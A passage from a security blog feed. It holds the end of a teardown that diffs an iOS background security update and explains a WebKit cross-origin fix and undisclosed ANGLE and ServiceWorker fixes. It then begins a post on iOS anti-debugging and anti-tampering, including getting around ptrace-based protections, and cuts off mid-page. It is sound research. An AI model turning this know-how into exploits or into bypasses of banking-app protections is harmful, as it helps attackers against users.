prerequisite <code>--build</code>:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:&quot;bada5d88-9c0c-4750-9989-fa5b59d5232a&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#10095; ipsw dl ota --platform ios \
              --rsr \
              --device iPhone17,1 \
              --build 23D8133 \
              --output /tmp/BSI
   &#8226; Getting iOS 26.3.1 OTA    build=23D771330a device=iPhone17,1
     encrypted=true key=ER+89JD/fR9xK0MwXhPHfkmPRMnAxBNkOF5v8nfGzk0=
     model=D93AP type=iOS2631BetaBSI
        26.50 MiB / 26.50 MiB [==============================| &#9989; ] 30.58 MiB/s</code></pre></div><p>26.5 MiB total. A full OTA is 3-17 GB. That size difference is the whole point: small, targeted patches to the cryptex volumes.</p><p>The <code>--build</code> flag is the prerequisite build (the base OS the BSI patches on top of), not the BSI build itself. Find the latest build with:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:&quot;afe62274-8e63-4003-b166-77810ff287fc&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#10095; ipsw download ota --platform ios --device iPhone17,1 --show-latest-build</code></pre></div><h3>Inspecting the BSI OTA</h3><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:&quot;044bab6e-521f-4fa2-b72f-da88815a9f82&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#10095; ipsw ota info &lt;BSI&gt;.aea

[OTA Info]
==========
Version        = 26.3.1 (a)
BuildVersion   = 23D771330a
OS Type        = SplatPreRelease
SystemOS       = 043-61970-021.dmg
AppOS          = 043-62774-021.dmg
RestoreVersion = 23.4.133.77.1,0
PrereqBuild    = 23D8133
IsRSR          = &#9989;

Devices
-------
 &gt; iPhone17,1_23D771330a</code></pre></div><p><code>PrereqBuild = 23D8133</code> tells you this is a delta on top of iOS 26.3 build <code>23D8133</code>. The <code>IsRSR</code> flag is still there because internally Apple still calls this the &#8220;Splat&#8221; system (SplatOnly in asset metadata). Two separate cryptex DMGs get patched: SystemOS for frameworks and AppOS for apps.</p><h3>What&#8217;s in the package</h3><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:&quot;deb9edce-ad1e-4896-94de-041a07cc86dd&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#10095; ipsw ota ls &lt;BSI&gt;.aea -V -b

AssetData/
&#9500;&#9472;&#9472; Info.plist                                          # 1.7 kB
&#9500;&#9472;&#9472; boot/
&#9474;   &#9500;&#9472;&#9472; BuildManifest.plist                             # 19 kB
&#9474;   &#9500;&#9472;&#9472; Firmware/
&#9474;   &#9474;   &#9500;&#9472;&#9472; 043-61970-021.dmg.root_hash                # 229 B
&#9474;   &#9474;   &#9500;&#9472;&#9472; 043-61970-021.dmg.trustcache               # 2.7 kB
&#9474;   &#9474;   &#9500;&#9472;&#9472; 043-62774-021.dmg.root_hash                # 229 B
&#9474;   &#9474;   &#9492;&#9472;&#9472; 043-62774-021.dmg.trustcache               # 407 B
&#9474;   &#9500;&#9472;&#9472; Restore.plist
&#9474;   &#9500;&#9472;&#9472; RestoreVersion.plist
&#9474;   &#9492;&#9472;&#9472; SystemVersion.plist
&#9500;&#9472;&#9472; payload.bom                                         # 38 kB
&#9500;&#9472;&#9472; payload.bom.signature
&#9500;&#9472;&#9472; payloadv2.bom                                       # 38 kB
&#9500;&#9472;&#9472; payloadv2.bom.signature
&#9492;&#9472;&#9472; payloadv2/
    &#9500;&#9472;&#9472; image_patches/
    &#9474;   &#9500;&#9472;&#9472; cryptex-app                                 # 39 kB
    &#9474;   &#9500;&#9472;&#9472; cryptex-app-rev                             # 39 kB
    &#9474;   &#9500;&#9472;&#9472; cryptex-system-arm64e                       # 15 MB
    &#9474;   &#9492;&#9472;&#9472; cryptex-system-arm64e-rev                   # 15 MB
    &#9500;&#9472;&#9472; data_payload                                    # 12 B
    &#9500;&#9472;&#9472; firmlinks_payload                               # 0 B
    &#9500;&#9472;&#9472; fixup.manifest
    &#9500;&#9472;&#9472; links.txt                                       # 0 B
    &#9500;&#9472;&#9472; payload.000                                     # 78 B
    &#9500;&#9472;&#9472; payload.000.ecc                                 # 123 B
    &#9500;&#9472;&#9472; payload_chunks.txt
    &#9500;&#9472;&#9472; prepare_payload                                 # 12 B
    &#9492;&#9472;&#9472; removed.txt                                     # 0 B</code></pre></div><p>Almost everything interesting is in <code>payloadv2/image_patches/. cryptex-system-arm64e</code> at 15 MB is the binary patch for the system cryptex (WebKit, Safari, system libraries). <code>cryptex-app</code> at 39 KB patches the app cryptex. The <code>-rev</code> variants are reverse patches for rolling back a BSI to the base OS state.</p><p>Under <code>boot/Firmware/</code>, the <code>.root_hash</code> and <code>.trustcache</code> files bind the patched cryptexes into the device&#8217;s Secure Boot chain via a separate <code>Cryptex1Image4</code> manifest.</p><h3>Patching the cryptex volumes</h3><p>To apply the patches and get mountable DMGs, use <code>ipsw ota patch rsr.</code> You need the base OTA&#8217;s cryptex volumes first, so download the prerequisite OTA (the 7.81 GiB one):</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:&quot;62b8456b-cf1a-4ed7-8d3d-ef8bc32c879a&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#10095; ipsw dl ota --platform ios --device iPhone17,1 --build 23D8133 --output /tmp/OTAs/
   &#8226; Getting iOS 26.3.1 OTA    build=23D8133 device=iPhone17,1
     encrypted=true key=P1OahXDSqR+X5Lc63VFT9JDZFtR6cHtIc+ryyJ9kuLs=
     model=D93AP type=iOS2631Long
      &#8226; URL resolved to: 17.253.27.196 (Apple Inc - Chicago, IL. United States)
        7.81 GiB / 7.81 GiB [==============================| &#9989; ] 59.81 MiB/s</code></pre></div><p>Extract the base cryptex volumes from it:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:&quot;c31a8c46-108b-4351-af56-e63ede90ea48&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#10095; ipsw ota patch rsr &lt;base_ota&gt;.aea --output /tmp/PATCHES/
   &#8226; Patching cryptex-app to /tmp/PATCHES/23D8133__iPhone17,1/AppOS/094-25810-058.dmg
   &#8226; Patching cryptex-system-arm64e to /tmp/PATCHES/23D8133__iPhone17,1/SystemOS/094-26339-058.dmg</code></pre></div><p>Now apply the BSI patch on top:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:&quot;80620562-77a8-4886-b813-4ffe303d48d8&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#10095; ipsw ota patch rsr --input /tmp/PATCHES/23D8133__iPhone17,1/ \
                      --output /tmp/PATCHES/ \
                      &lt;BSI&gt;.aea
   &#8226; Patching cryptex-app to /tmp/PATCHES/23D771330a__iPhone17,1/AppOS/043-62774-021.dmg
   &#8226; Patching cryptex-system-arm64e to /tmp/PATCHES/23D771330a__iPhone17,1/SystemOS/043-61970-021.dmg</code></pre></div><p>You now have the patched cryptex DMGs. Mount and poke around:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:&quot;0823d593-1d52-4d8b-9d38-ab3c88081695&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#10095; open /tmp/PATCHES/23D771330a__iPhone17,1/SystemOS/043-61970-021.dmg
&#10095; find /Volumes/*Cryptex*/ -name &#8220;dyld_shared_cache*&#8221;</code></pre></div><p>NOTE:  <code>ipsw ota patch rsr</code> requires macOS 13+ because it calls <code>RawImagePatch</code> in <code>libParallelCompression.dylib</code> to apply the binary image diffs. This is a private API I reversed with no public header.</p><h3>Diffing the BSI</h3><p>Now the fun part. I&#8217;ve updated <code>ipsw diff</code> to work directly with patched OTA directories:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:&quot;32834311-cd86-497f-be04-aa7c2061a018&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#10095; ipsw diff /tmp/PATCHES/23D8133__iPhone17,1 \
            /tmp/PATCHES/23D771330a__iPhone17,1 \
            --files --output /tmp/DIFF --markdown
   &#8226; Mounting patched OTA DMGs
   &#8226; Mounting &#8216;Old&#8217; patched OTA DMGs
   &#8226; Mounting AppOS DMG
      &#8226; Mounting /tmp/PATCHES/23D8133__iPhone17,1/AppOS/094-25810-058.dmg
   &#8226; Mounting SystemOS DMG
      &#8226; Mounting /tmp/PATCHES/23D8133__iPhone17,1/SystemOS/094-26339-058.dmg
   &#8226; Mounting &#8216;New&#8217; patched OTA DMGs
   &#8226; Mounting AppOS DMG
      &#8226; Mounting /tmp/PATCHES/23D771330a__iPhone17,1/AppOS/043-62774-021.dmg
   &#8226; Mounting SystemOS DMG
      &#8226; Mounting /tmp/PATCHES/23D771330a__iPhone17,1/SystemOS/043-61970-021.dmg
   &#8226; Diffing DYLD_SHARED_CACHES
   &#8226; Diffing MachOs
   &#8226; Diffing Files
   &#8226; Creating diff file Markdown README</code></pre></div><p>It mounts both sets of cryptex DMGs, diffs the <code>dyld_shared_cache</code>, individual MachOs, and the file trees, then writes a Markdown report. The full diff output is <a href="https://github.com/blacktop/ipsw-diffs/blob/main/23D8133__iPhone17,1__vs_23D771330a__iPhone17,1/README.md">on GitHub</a>.</p><p>NOTE: <code>ipsw diff</code> operates at the <strong>symbol level</strong>, not the instruction level. It reports added/removed symbols, function count changes, and section size deltas -- but it will miss changes <em>inside</em> a function whose signature didn&#8217;t change. For example, the CVE-2026-20643 fix added 46 instructions to <code>innerDispatchNavigateEvent</code> without changing its symbol name, so the diff report doesn&#8217;t flag it at all. To catch those, you need to decompile the actual functions (IDA Pro, Ghidra, or <code>ipsw dsc disass --dec</code>, for now &#128527;) and compare the pseudocode. The diff is a great starting point for triage, but it&#8217;s not the full picture.</p><p>So what did Apple actually change?</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:&quot;9a4f4802-5b6a-4b5d-927a-b4496eb29731&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">WebKit version bump
+----------------------+--------------+
|                      | Version      |
+----------------------+--------------+
| Base (23D8133)       | 623.2.7.10.4 |
| BSI (23D771330a)     | 623.2.7.110.1|
+----------------------+--------------+</code></pre></div><p>That&#8217;s the Safari/WebKit version going from <code>7623.2.7.10.4</code> to <code>7623.2.7.110.1</code>.</p><p>NOTE: Normally <code>ipsw dsc webkit --git</code> resolves a DSC&#8217;s WebKit version to the exact public git tag on <a href="https://github.com/WebKit/WebKit">github.com/WebKit/WebKit</a>, giving you a clean <code>git diff</code> between two tags. Here, neither version had an exact match and both fell back to the closest tag <code>WebKit-7623.1.14.14.11</code> from November 2025. My guess is Apple ships BSI builds from an internal branch that never gets tagged publicly. I had to find the fix commit manually (more on that below).</p><h4>Updated binaries in AppOS (6)</h4><p>All Safari-related:</p><ul><li><p><code>AuthenticationServicesAgent</code>: handles web authentication flows</p></li><li><p><code>com.apple.Safari.History</code></p></li><li><p><code>passwordbreachd</code>: checks passwords against breach databases</p></li><li><p><code>safarifetcherd</code>: prefetching/background loading</p></li><li><p><code>webbookmarksd</code>: bookmark sync daemon</p></li><li><p><code>webinspectord</code>: Web Inspector remote debugging</p></li></ul><p>Every one got the same version bump <code>7623.2.7.10.4</code> -&gt; <code>7623.2.7.110.1</code>). The changes are mostly in <code>__TEXT.__info_plist</code> sizes (a few bytes larger) and new UUIDs. The actual code sections didn&#8217;t change in these binaries, so the AppOS patch is just version metadata and plist updates.</p><h4>Updated dylibs in the dyld_shared_cache (6)</h4><p>The <code>dyld_shared_cache</code> is where the actual code changes live. Six dylibs changed:</p><ol><li><p><code>WebCore</code></p></li><li><p><code>libANGLE-shared.dylib</code></p></li><li><p><code>WebGPU</code></p></li><li><p><code>ProductKit</code></p></li><li><p><code>ProductKitCore</code></p></li><li><p><code>SettingsFoundation.</code></p></li></ol><p>I opened both DSC versions in IDA Pro (using <code>open_dsc</code> to load individual modules) and decompiled the changed functions.</p><h3>CVE-2026-20643: Navigation API Same-Origin bypass</h3><p>Apple&#8217;s <a href="https://support.apple.com/en-us/126604">security advisory</a> describes one fix:</p><blockquote><p><strong>WebKit</strong> -- A cross-origin issue in the Navigation API was addressed with improved input validation.</p><p>CVE-2026-20643 -- Thomas Espach</p></blockquote><p>The Navigation API <code>window.navigation</code>) lets JavaScript intercept and control navigations within a page. The property that matters here is <code>NavigateEvent.canIntercept</code> because it tells a script whether it&#8217;s allowed to intercept a given navigation. <a href="https://html.spec.whatwg.org/multipage/nav-history-apis.html#can-have-its-url-rewritten">The spec</a> says it should be false when the document URL and target URL differ in scheme, username, password, host, or port.</p><h4>The source fix</h4><p>Since WebKit is open source, I tracked down the public trail:</p><ul><li><p><strong>PR:</strong> <a href="https://github.com/WebKit/WebKit/pull/58094">WebKit/WebKit#58094</a> -- <em>&#8220;NavigationEvent#canIntercept is true when navigating to a different port&#8221;</em></p></li><li><p><strong>Bugzilla:</strong> <a href="https://bugs.webkit.org/show_bug.cgi?id=307197">Bug 307197</a> -- reported by Dom Christie on 2026-02-06, fixed by Ahmad Saleem</p></li><li><p><strong>Commit:</strong> <a href="https://commits.webkit.org/307316@main">850ce3163e55</a></p></li><li><p><strong>Shipped in:</strong> Safari Technology Preview 238</p></li></ul><p>Apple&#8217;s CVE advisory references a different bug number (Bugzilla #306050, which is private). Bug 307197 is either the public duplicate or the upstream report that the security-track bug was filed against.</p><p>The fix is in <code>Source/WebCore/page/Navigation.cpp</code>, function <code>documentCanHaveURLRewritten()</code>:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;cpp&quot;,&quot;nodeId&quot;:&quot;e7648d81-1e5f-4aff-ae43-e1b1a08620a6&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-cpp"> static bool documentCanHaveURLRewritten(const Document&amp; document, const URL&amp; targetURL)
 {
     // ...existing isSameSite and isSameOrigin checks...
     if (!isSameSite &amp;&amp; !isSameOrigin)
         return false;
+    // https://html.spec.whatwg.org/multipage/nav-history-apis.html#can-have-its-url-rewritten
+    if (documentURL.protocol() != targetURL.protocol()
+        || documentURL.user() != targetURL.user()
+        || documentURL.password() != targetURL.password()
+        || documentURL.host() != targetURL.host()
+        || documentURL.port() != targetURL.port())
+        return false;
+
     if (targetURL.protocolIsInHTTPFamily())
         return true;</code></pre></div><p>You might wonder: doesn&#8217;t <code>isSameOriginAs</code> already check the port? It does. <a href="https://github.com/WebKit/WebKit/blob/main/Source/WebCore/page/SecurityOrigin.cpp">Looking at the source</a>, <code>isSameOriginAs()</code> calls <code>isSameSchemeHostPort()</code>, which compares scheme, host, and port.</p><p>The problem is the boolean logic <em>upstream</em> of this function. The caller in <code>documentCanHaveURLRewritten()</code> combined both checks with <strong>AND</strong>: <code>if (!isSameSite &amp;&amp; !isSameOrigin) return false</code>. Since <code>localhost:3000</code> and <code>localhost:3001</code> share the same registrable domain and scheme, isSameSiteAs returns true. That short-circuits the AND so the <code>isSameOriginAs</code> result never matters. The function falls straight through to return true for any HTTP URL.</p><h4>Confirming in the binary</h4><p>I confirmed this by decompiling <code>WebCore::Navigation::innerDispatchNavigateEvent</code> (at <code>0x1a1307304</code>) from both DSC versions in IDA Pro.</p><p>The base version calls two origin checks joined by AND:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;cpp&quot;,&quot;nodeId&quot;:&quot;60c85edf-995a-40fa-9433-dd9897856a14&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-cpp">// BASE innerDispatchNavigateEvent (23D8133 DSC)
isSameSiteAs = SecurityOrigin::isSameSiteAs(docOrigin, navOrigin);
isSameOriginAs = SecurityOrigin::isSameOriginAs(docOrigin, navOrigin);
if ((isSameSiteAs &amp; 1) == 0 &amp;&amp; !isSameOriginAs)
    isCrossOrigin = true;  // only blocked if BOTH fail</code></pre></div><p>The patched version drops isSameSiteAs and adds explicit URL component comparison instead:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;cpp&quot;,&quot;nodeId&quot;:&quot;a85470b7-af3a-433e-ace6-7ef5661e27a2&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-cpp">// PATCHED innerDispatchNavigateEvent (23D771330a DSC)
if (SecurityOrigin::isSameOriginAs(docOrigin, navOrigin)) {
    docHost = URL::host(documentURL);
    navHost = URL::host(targetURL);
    if (String::equal(docHost, navHost)) {
        docPort = URL::port(documentURL);
        navPort = URL::port(targetURL);
        isCrossOrigin = !String::equal(docPort, navPort);
    } else {
        isCrossOrigin = true;
    }
} else {
    isCrossOrigin = true;
}</code></pre></div><p>The function grew by 46 ARM64 instructions (1243 -&gt; 1289). The <code>isSameSiteAs</code> call was deleted entirely.</p><p>What does this mean in practice? A page on <code>http://localhost:3000</code> could intercept navigations targeting <code>http://localhost:8080</code>. These are different ports and origins but WebKit lets it through. In a shared-hosting or multi-tenant setup, that&#8217;s cross-origin state manipulation.</p><h3>What Apple didn&#8217;t disclose</h3><p>The CVE covers the Navigation API fix. But this BSI also shipped two other changes that aren&#8217;t in the advisory &#128578;.</p><h4>WebGL integer overflow in ANGLE</h4><p><code>libANGLE-shared.dylib</code> (Apple&#8217;s Metal-backed ANGLE for OpenGL ES) changed the <code>ProvokingVertexHelper::generateIndexBuffer</code> and preconditionIndexBuffer methods. The parameter types narrowed from <code>size_t</code> (64-bit) to <code>int/unsigned int</code> (32-bit), and both functions grew in size <code>generateIndexBuffer</code> went from 680 to 772 bytes per IDA; <code>preconditionIndexBuffer</code> grew similarly per the symbol diff).</p><p>I decompiled <code>generateIndexBuffer</code> from both DSC versions in IDA Pro. Here&#8217;s the relevant section, side by side.</p><p><strong>Base </strong>(<code>23D8133</code>, <code>size_t</code> parameters, no overflow check):</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;71224eaa-7856-4a22-9133-1e6c8fb89e80&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">LODWORD(v18) = a4 &amp; ~(a4 &gt;&gt; 31);
v36 = v18;
v20 = 2 * v18;   // index count &#8212; no overflow check
// ... v20 flows directly into buffer allocation size</code></pre></div><p><strong>Patched</strong> <code>23D771330a</code>, <code>int</code> parameters, overflow guard added):</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;35af37c3-e50d-4513-a139-adff3a37e0d0&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">LODWORD(v34) = a4;
v20 = 2LL * a4;    // widen to 64-bit before multiply
v35 = v20;
// ... then before using the result:
if (HIDWORD(v20))  // upper 32 bits non-zero &#8594; overflow
{
    handleError(a2, GL_INVALID_OPERATION,
        &#8220;Integer overflow.&#8221;,
        &#8220;.../ProvokingVertexHelper.mm&#8221;,
        &#8220;generateIndexBuffer&#8221;, 217);
    return 1;
}</code></pre></div><p>In the base version, <code>2 * vertexCount</code> uses <code>size_t </code>arithmetic so a large enough input wraps silently and the buffer allocation comes out too small. After the fix, the multiply widens to 64-bit first <code>2LL * a4</code>), then checks the upper 32 bits. Non-zero means overflow, and the function bails with <code>GL_INVALID_OPERATION</code> instead of allocating a short buffer.</p><p>In the Metal rendering path, an undersized index buffer means an out-of-bounds GPU read during WebGL draw calls. The new assertion strings (<code>generateIndexBuffer</code>&#8221;, <code>preconditionIndexBuffer</code>&#8221;, and the ANGLE source path) confirm this was an intentional hardening pass, not just a type cleanup.</p><h4>ServiceWorker registration lifetime hardening</h4><p><code>WebCore</code> dropped 6 functions and 14 symbols, all in the ServiceWorker server implementation:</p><ul><li><p><code>HashMap&lt;ProcessQualified&lt;UUID&gt;</code>, <code>WeakRef&lt;SWServerRegistration&gt;&gt;</code> replaced with HashMap&lt;..., <code>Ref&lt;SWServerRegistration&gt;&gt;</code> (weak -&gt; strong references)</p></li><li><p><code>SWServerRegistration</code> changed from <code>RefCountedAndCanMakeWeakPtr</code> to plain <code>RefCounted</code> (weak pointer support removed)</p></li><li><p><code>SWServerJobQueue::cancelJobsFromServiceWorker</code> removed entirely</p></li><li><p>Several hash map lookup/removal helpers for <code>ProcessQualified&lt;UUID&gt;</code> maps were removed</p></li></ul><p>With the <code>WeakRef</code>-<code>Ref</code> change, the server&#8217;s registration map holds a strong reference to each <code>SWServerRegistration</code>, so the registration can&#8217;t be deallocated while something still points at it. The <code>cancelJobsFromServiceWorker</code> removal suggests the job cancellation logic moved elsewhere. This is the kind of change you make when weak references can dangle in a concurrent context.</p><p>Unlike the Navigation API fix, this change hasn&#8217;t landed on <a href="https://github.com/WebKit/WebKit/blob/main/Source/WebCore/workers/service/server/SWServerRegistration.h">public WebKit main</a>; as of this writing, <code>SWServerRegistration</code> still inherits from <code>RefCountedAndCanMakeWeakPtr</code>, <code>m_scopeToRegistrationMap</code> still uses <code>WeakRef</code>, and <code>cancelJobsFromServiceWorker</code> still exists. This is an Apple-internal patch, visible only in the BSI binary. The evidence here comes entirely from symbol-level diffing and decompilation, not source.</p><h4>Non-security changes</h4><p><code>ProductKit</code> and <code>ProductKitCore</code> both went <em>down</em> in version <code>129.400.11.2.4</code> -&gt; <code>129.400.11.2.2</code>), removed device model strings for unannounced hardware (Mac17,6-Mac17,9; iPad16,8-iPad16,11), and got slightly smaller. These were likely pulled into the BSI as dependencies of the WebKit rebuild.</p><p><code>SettingsFoundation</code> removed the <code>_SFDeviceSupportsRFExposure2026OrLater</code> function and associated <code>RF_INTRO_IPHONE_2026</code>&#8221; string. RF exposure regulatory check removed or consolidated elsewhere.</p><p><code>WebGPU</code> gained one new symbol <code>Vector&lt;pair&lt;AST::Function*, String&gt;&gt;::expandCapacity</code>). This is a template instantiation pulled in by the WebKit rebuild, not a functional change.</p><h4>File changes</h4><p>Only <code>.fseventsd</code> journal entries rotated. No actual filesystem content was added or removed.</p><h3>Conclusion</h3><p>Apple&#8217;s first BSI shipped one fix for CVE-2026-20643 and two they didn&#8217;t mention. The CVE fix was a six-line fix to a URL component comparison that the spec already required. It is the kind of bug where you read the spec, read the code, and wonder how it shipped without the check. The ANGLE integer overflow and ServiceWorker lifetime hardening are arguably more interesting: one is a WebGL-reachable memory safety issue, the other plugs a dangling-reference hole in a concurrent subsystem. Neither made the advisory.</p><p>The BSI delivery itself worked as advertised. 26.5 MiB, two cryptex DMGs, no user interaction. If you want to do this kind of teardown yourself: <code>ipsw ota patch rsr</code> gets you mountable DMGs, <code>ipsw diff</code> gives you the symbol-level triage, and IDA on the extracted DSC modules gets you pseudocode to confirm what actually changed. The full diff is <a href="https://github.com/blacktop/ipsw-diffs/blob/main/23D8133__iPhone17,1__vs_23D771330a__iPhone17,1/README.md">on GitHub</a>.</p><p><em>&#8212;blacktop</em></p>]]></content:encoded></item><item><title><![CDATA[Taking Apart iOS Apps: Anti-Debugging and Anti-Tampering in the Wild]]></title><description><![CDATA[Table Of Contents]]></description><link>https://blog.calif.io/p/taking-apart-ios-apps-anti-debugging</link><guid isPermaLink="false">https://blog.calif.io/p/taking-apart-ios-apps-anti-debugging</guid><dc:creator><![CDATA[Calif]]></dc:creator><pubDate>Tue, 17 Mar 2026 18:22:08 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!ICQe!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb5b29dd2-0b00-49e5-b2af-4660a306e76d_1442x488.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p><strong>Table Of Contents</strong></p><ol><li><p><a href="https://blog.calif.io/i/191281303/1-the-app-that-exploited-ios-side-channels">The App That Exploited iOS Side Channels</a></p></li><li><p><a href="https://blog.calif.io/i/191281303/2-the-app-that-checked-itself">The App That Checked Itself</a></p></li><li><p><a href="https://blog.calif.io/i/191281303/3-the-app-that-killed-itself-on-attach">The App That Killed Itself on Attach</a></p></li><li><p><a href="https://blog.calif.io/i/191281303/4-the-app-that-ruined-its-own-crash-logs">The App That Ruined Its Own Crash Logs</a></p></li><li><p><a href="https://blog.calif.io/i/191281303/5-the-app-that-let-ios-do-the-killing">The App That Let iOS Do the Killing</a></p></li><li><p><a href="https://blog.calif.io/i/191281303/6-the-app-that-kept-checking">The App That Kept Checking</a></p></li><li><p><a href="https://blog.calif.io/i/191281303/conclusion">Conclusion</a></p></li></ol><p>This journey started from a mix of curiosity and convenience. Some of us wanted to push a game a bit further and show off a better score. At the same time, as part of red team work, we were interested in how banking apps handled money behind the scenes. The goal was simple: attach a debugger, observe behavior, and figure out how things worked.</p><p>That did not always go as expected.</p><p>Some apps would exit immediately. Others ran for a while, then failed later without any clear reason. In a few cases, there was no usable crash at all. Each app behaved differently, but after going through enough of them, the same patterns kept showing up.</p><p>Developers of these apps are not relying on a single check anymore. They combine multiple techniques to make inspection harder and modification unreliable, even on non-jailbroken devices. The techniques themselves are not new. What stands out is how they are layered together and how early they are applied. Over time, it becomes less about a single protection and more about how they interact.</p><p>This article walks through a set of these techniques and how they show up in practice on iOS apps.</p><h2>1. The App That Exploited iOS Side Channels</h2><p>One app we looked at would fail before any meaningful logic executed. With no debugger attached and no modifications in place, the app still exits immediately on launch.</p><p>It turned out the app was performing early environment checks by relying on side-channel signals rather than explicit APIs. It called into a private system API and used the return behavior to infer whether certain apps were installed on the device. If anything suspicious showed up, it stopped there.</p><p>A notable case involved a banking application that used the private API <code>SBSLaunchApplicationWithIdentifierAndURLAndLaunchOptions</code>. It did not use the API for its intended purpose. Instead, it inspected the return logs as a side channel. By doing this, it could detect the presence of applications commonly associated with modified environments, based on bundle identifiers such as <code>com.opa334.TrollStore</code>, <code>org.coolstar.SileoStore</code>, <code>com.tigisoftware.Filza</code>, and others. If any of these were detected, the app assumed the device was not trustworthy and refused to proceed.</p><p>This specific behavior was later addressed by Apple in iOS 18.5 (CVE-2025-31207), but the pattern is still relevant.</p><p><strong>Technique: Pre-execution environment checks</strong></p><ul><li><p>Query system APIs, including undocumented ones, for indirect signals</p></li><li><p>Use side-channel behavior such as API return logs to detect installed applications</p></li><li><p>Detect presence of known tools via bundle identifiers</p></li></ul><h2>2. The App That Checked Itself</h2><p>Some apps go further and verify their own state before doing anything useful.</p><p>A common approach, especially in games, is to query code signing state using <code>csops()</code>. In particular, checking <code>CS_OPS_ENTITLEMENTS_BLOB</code> allows the app to retrieve its own entitlements. Unexpected entitlements can indicate a modified or non-standard environment. This gives the app another signal to decide whether it is running on a jailbroken device.</p><p>Some apps also verify their own integrity before continuing. This includes computing hashes such as <code>CRC32</code> or <code>MD5</code> across application data and checking the signing certificate of the installed IPA. Structures like <code>LC_ENCRYPTION_INFO_64</code> are used to detect whether the app has been re-signed or altered.</p><p><strong>Technique: Pre-execution environment checks</strong></p><ul><li><p>Use <code>csops()</code> with <code>CS_OPS_ENTITLEMENTS_BLOB</code> to inspect entitlements and infer jailbreak state</p></li><li><p>Perform file integrity checks using <code>CRC32</code> and <code>MD5</code></p></li><li><p>Validate signing certificates and detect re-signing via <code>LC_ENCRYPTION_INFO64</code></p></li></ul><h2>3. The App That Killed Itself on Attach</h2><p>Another pattern shows up once you try to attach a debugger: the app exits immediately.</p><p>In most cases, this comes down to <code>ptrace()</code> with <code>PT_DENY_ATTACH</code>. When that flag is set, any attempt to attach a debugger causes the process to terminate, usually through <code>abort()</code> or <code>exit()</code>.</p><p>The usual way around this is to deal with the termination path rather than the detection. If the app cannot terminate itself, it continues running. Patching the execution flow to bypass calls to <code>abort()</code> and <code>exit()</code> is often enough to keep the process alive and allow runtime inspection.</p><p>When <code>PT_DENY_ATTACH</code> is used directly, there are also existing workarounds that modify or disable its behavior so a debugger can attach. These approaches have been documented in detail, including a write-up by <a href="https://bryce.co/undebuggable/">Bryce Bostwick</a> that walks through the process of dealing with <code>ptrace()</code> on iOS.</p><p><strong>Technique: Runtime anti-debugging with </strong><code>ptrace()</code></p><ul><li><p>Call <code>ptrace(PT_DENY_ATTACH)</code> to block debugger attachment</p></li><li><p>Trigger process termination when debugging is detected</p></li></ul><h2>4. The App That Ruined Its Own Crash Logs</h2><p>Some apps do not just exit. They also make sure you cannot learn anything from the crash.</p><p>We ran into one that behaved normally until you tried to debug it. Then the crash logs stopped being useful. Registers were filled with the same, impossible value, and the backtrace did not point to anything meaningful.</p><p>Looking closer, the app was writing garbage into the CPU registers before crashing. In one case, every register was set to a constant like <code>0x123456789a00</code>. The crash still happened, but the state was no longer trustworthy, so there was nothing useful to extract from it.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!ICQe!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb5b29dd2-0b00-49e5-b2af-4660a306e76d_1442x488.jpeg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" 